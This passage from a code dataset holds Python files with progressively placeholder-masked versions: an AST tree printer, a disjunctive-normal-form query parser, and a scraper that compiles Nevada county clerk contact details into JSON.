print_intended('empty_array', indent)\n\n @addToClass(BinaryExpression)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Array)\n def printTree(self, indent=0):\n if self.list is not None:\n print_intended('array', indent)\n self.list.printTree(indent + 1)\n else:\n print_intended('empty_array', indent)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Identifier)\n def printTree(self, indent=0):\n print_intended(self.name, indent)\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n\n @addToClass(For)\n def printTree(self, indent=0):\n print_intended(self.type, indent)\n self.variable.printTree(indent + 1)\n self.range.printTree(indent + 1)\n self.instruction.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in 
self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(Assignment)\n def printTree(self, indent=0):\n print_intended(self.operator, indent)\n self.left.printTree(indent + 1)\n self.right.printTree(indent + 1)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @addToClass(List)\n def printTree(self, indent=0):\n for element in self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<function token>\n<function token>\n<class token>\n" ]
false
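Note: throughout the TreePrinter steps above, the addToClass decorator that attaches each printTree method to its node class has been abstracted away as <function token>. Its definition is not part of this record; a common implementation of this monkey-patching pattern (an assumption shown only for context, not the record's own code) is:

def addToClass(cls):
    # Register the decorated function as a method on cls, under the
    # function's own name; used to spread printTree across node classes.
    def decorator(func):
        setattr(cls, func.__name__, func)
        return func
    return decorator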
43
999de0965efa3c1fe021142a105dcf28184cd5ba
import dnf_converter

def parse(query):
    print("parsing the query...")
    # Normalize the query to disjunctive normal form: {"$or": [cp, cp, ...]}
    query = dnf_converter.convert(query)
    cp_clause_list = []  # one entry per conjunctive part (cp)
    clause_list = []     # every clause, flattened across all cps
    for cp in query["$or"]:
        clauses = []
        if "$and" in cp:
            # A conjunctive part with several clauses ANDed together.
            for clause in cp["$and"]:
                clauses.append(clause)
                clause_list.append(clause)
        else:
            # A bare clause acts as a one-clause conjunctive part.
            clause = cp
            clauses.append(clause)
            clause_list.append(clause)
        cp_clause_list.append({ "cp": cp, "clauses": clauses })
    return cp_clause_list, clause_list
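A quick illustration of what parse returns. This sketch assumes (it is not shown in the record) that dnf_converter.convert leaves a query that is already in disjunctive normal form unchanged:

# Hypothetical input, already in {"$or": [...]} form after convert():
query = {"$or": [{"$and": [{"a": 1}, {"b": 2}]}, {"c": 3}]}
cp_clause_list, clause_list = parse(query)
# cp_clause_list == [
#     {"cp": {"$and": [{"a": 1}, {"b": 2}]}, "clauses": [{"a": 1}, {"b": 2}]},
#     {"cp": {"c": 3}, "clauses": [{"c": 3}]},
# ]
# clause_list == [{"a": 1}, {"b": 2}, {"c": 3}]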
[ "import dnf_converter\n\ndef parse(query):\n\tprint(\"parsing the query...\")\n\tquery = dnf_converter.convert(query)\n\tcp_clause_list = []\n\tclause_list = []\n\tfor cp in query[\"$or\"]:\n\t\tclauses = []\n\t\tif \"$and\" in cp:\n\t\t\tfor clause in cp[\"$and\"]:\n\t\t\t\tclauses.append(clause)\n\t\t\t\tclause_list.append(clause)\n\t\telse:\n\t\t\tclause = cp\n\t\t\tclauses.append(clause)\n\t\t\tclause_list.append(clause)\n\t\tcp_clause_list.append({ \"cp\": cp, \"clauses\": clauses })\n\treturn cp_clause_list, clause_list", "import dnf_converter\n\n\ndef parse(query):\n print('parsing the query...')\n query = dnf_converter.convert(query)\n cp_clause_list = []\n clause_list = []\n for cp in query['$or']:\n clauses = []\n if '$and' in cp:\n for clause in cp['$and']:\n clauses.append(clause)\n clause_list.append(clause)\n else:\n clause = cp\n clauses.append(clause)\n clause_list.append(clause)\n cp_clause_list.append({'cp': cp, 'clauses': clauses})\n return cp_clause_list, clause_list\n", "<import token>\n\n\ndef parse(query):\n print('parsing the query...')\n query = dnf_converter.convert(query)\n cp_clause_list = []\n clause_list = []\n for cp in query['$or']:\n clauses = []\n if '$and' in cp:\n for clause in cp['$and']:\n clauses.append(clause)\n clause_list.append(clause)\n else:\n clause = cp\n clauses.append(clause)\n clause_list.append(clause)\n cp_clause_list.append({'cp': cp, 'clauses': clauses})\n return cp_clause_list, clause_list\n", "<import token>\n<function token>\n" ]
false
44
cb08f64d1ad7e53f1041684d4ca4ef65036c138d
import json
import re
from bs4 import BeautifulSoup
from bs4.element import NavigableString, Tag

from common import dir_path


def is_element(el, tag):
    return isinstance(el, Tag) and el.name == tag


class ElemIterator():
    def __init__(self, els):
        self.els = els
        self.i = 0

    def peek(self):
        try:
            return self.els[self.i]
        except IndexError:
            return None

    def __next__(self):
        self.i += 1
        return self.els[self.i - 1]

    def hasNext(self):
        return len(self.els) > (self.i)

    def peek_till(self, tag):
        while not is_element(self.peek(), tag):
            self.__next__()

    def next_till(self, tag):
        self.peek_till(tag)
        self.__next__()


def parse_lines(iter_):
    iter_.peek_till('strong')

    county = []
    while iter_.hasNext():
        county += [iter_.__next__()]

        if is_element(iter_.peek(), 'strong'):
            yield ElemIterator(county)
            county = []

    yield ElemIterator(county)
    county = []


def parse_emails_url(iter_):
    emails = []
    url = None

    try:
        while True:
            iter_.peek_till('a')
            email = iter_.__next__()
            href = email['href']
            if href.startswith('mailto:'):
                if href[7:]:
                    emails += [href[7:]]
                else:
                    emails += [email.text]
            else:
                url = href
    except IndexError:
        pass
    return emails, url


def parse_url(iter_):
    iter_.peek_till('a')
    link = iter_.__next__()
    href = link['href']
    assert not href.startswith('mailto:')
    return [href]


def parse_county(iter_):
    county_title = iter_.__next__().text.strip().title()
    locale = re.match('(.*) (City|County)', county_title).group(0)

    if county_title.startswith('Clark County Elections Mailing Address'):
        emails, url = parse_emails_url(iter_)
        return {
            'locale': locale,
            'county': locale,
            'emails': emails,
        }

    while True:
        el = iter_.__next__()
        if isinstance(el, NavigableString):
            if 'Clerk' in el or 'Registrar' in el:
                official = el.strip().split(',')[0]
                break

    address = []
    while True:
        el = iter_.__next__()
        if isinstance(el, NavigableString):
            address += [el.strip()]
            if re.search(r'Nevada \d{5}', el) or re.search(r'NV \d{5}', el):
                break

    el = iter_.__next__()
    el = iter_.__next__()
    if isinstance(el, NavigableString):
        el = el.replace(u'\xa0', ' ')  # replace non-breaking space
        matches1 = re.search(r'(\(\d{3}\) \d{3}-\d{4}) FAX (\(\d{3}\) \d{3}-\d{4})', el)
        matches2 = re.search(r'(\(\d{3}\) \d{3}-VOTE \(\d{4}\)) FAX (\(\d{3}\) \d{3}-\d{4})', el)
        if matches1:
            phone = matches1.group(1)
            fax = matches1.group(2)
        elif matches2:
            phone = matches2.group(1)
            fax = matches2.group(2)
        else:
            print(county_title)
            print(el)
            print(re.search(r'(\(\d{3}\) \d{3}-\d{4}) FAX', el))
            assert False

    emails, url = parse_emails_url(iter_)

    init = {'city': locale} if locale.endswith('City') else {'county': locale}

    return {
        **init,
        'locale': locale,
        'official': official,
        'address': ', '.join(address),
        'emails': list(set(emails)),
        'phones': [phone],
        'faxes': [fax],
        'url': url,
    }


def main():
    # Actually this file: https://www.nvsos.gov/sos/elections/voters/county-clerk-contact-information
    # But it's behind a javascript test
    with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:
        page = fh.read()
    soup = BeautifulSoup(page, 'lxml')
    ps = soup.select('div.content_area > p')
    iter_ = ElemIterator([x for p in ps for x in p.children])
    raw_counties = [parse_county(county) for county in parse_lines(iter_)]

    merge_counties = {}
    for county in raw_counties:
        locale = county['locale']
        if locale in merge_counties:
            merge_counties[locale]['emails'] += county['emails']
        else:
            merge_counties[locale] = county

    counties = list(merge_counties.values())
    assert len(counties) == len(raw_counties) - 1

    with open('public/nevada.json', 'w') as fh:
        json.dump(counties, fh)


if __name__ == '__main__':
    main()
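For orientation, this is the shape of one merged record that main() writes to public/nevada.json. The field names come from parse_county above; the values here are invented purely for illustration:

# {
#     "county": "Washoe County",
#     "locale": "Washoe County",
#     "official": "Jane Doe",
#     "address": "75 Court Street, Reno, Nevada 89501",
#     "emails": ["elections@example.gov"],
#     "phones": ["(775) 555-1234"],
#     "faxes": ["(775) 555-5678"],
#     "url": "https://example.gov/elections"
# }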
[ "import json\nimport re\nfrom bs4 import BeautifulSoup\nfrom bs4.element import NavigableString, Tag\n\nfrom common import dir_path\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator():\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > (self.i)\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\ndef parse_url(iter_):\n iter_.peek_till('a')\n link = iter_.__next__()\n href = link['href']\n assert not href.startswith('mailto:')\n return [href]\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {\n 'locale': locale,\n 'county': locale,\n 'emails': emails,\n }\n\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search(r'Nevada \\d{5}', el) or re.search(r'NV \\d{5}', el):\n break\n\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ') # replace non-breaking space\n matches1 = re.search(r'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el)\n matches2 = re.search(r'(\\(\\d{3}\\) \\d{3}-VOTE \\(\\d{4}\\)) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search(r'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX', el))\n assert False\n\n emails, url = parse_emails_url(iter_)\n\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n\n return {\n **init,\n 'locale': locale,\n 'official': official,\n 'address': ', '.join(address),\n 'emails': list(set(emails)),\n 'phones': [phone],\n 'faxes': [fax],\n 'url': url,\n }\n\n\ndef main():\n # Actually this file: https://www.nvsos.gov/sos/elections/voters/county-clerk-contact-information\n # But it's behind a javascript test\n with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n\n merge_counties = {}\n for county in raw_counties:\n locale = 
county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\nif __name__ == '__main__':\n main()\n", "import json\nimport re\nfrom bs4 import BeautifulSoup\nfrom bs4.element import NavigableString, Tag\nfrom common import dir_path\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\ndef parse_url(iter_):\n iter_.peek_till('a')\n link = iter_.__next__()\n href = link['href']\n assert not href.startswith('mailto:')\n return [href]\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\ndef main():\n with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = 
ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n merge_counties = {}\n for county in raw_counties:\n locale = county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\nif __name__ == '__main__':\n main()\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\ndef parse_url(iter_):\n iter_.peek_till('a')\n link = iter_.__next__()\n href = link['href']\n assert not href.startswith('mailto:')\n return [href]\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\ndef main():\n with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = 
BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n merge_counties = {}\n for county in raw_counties:\n locale = county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\nif __name__ == '__main__':\n main()\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\ndef parse_url(iter_):\n iter_.peek_till('a')\n link = iter_.__next__()\n href = link['href']\n assert not href.startswith('mailto:')\n return [href]\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\ndef main():\n with 
open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n merge_counties = {}\n for county in raw_counties:\n locale = county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\n<code token>\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\ndef main():\n with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = 
BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n merge_counties = {}\n for county in raw_counties:\n locale = county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\n<code token>\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except 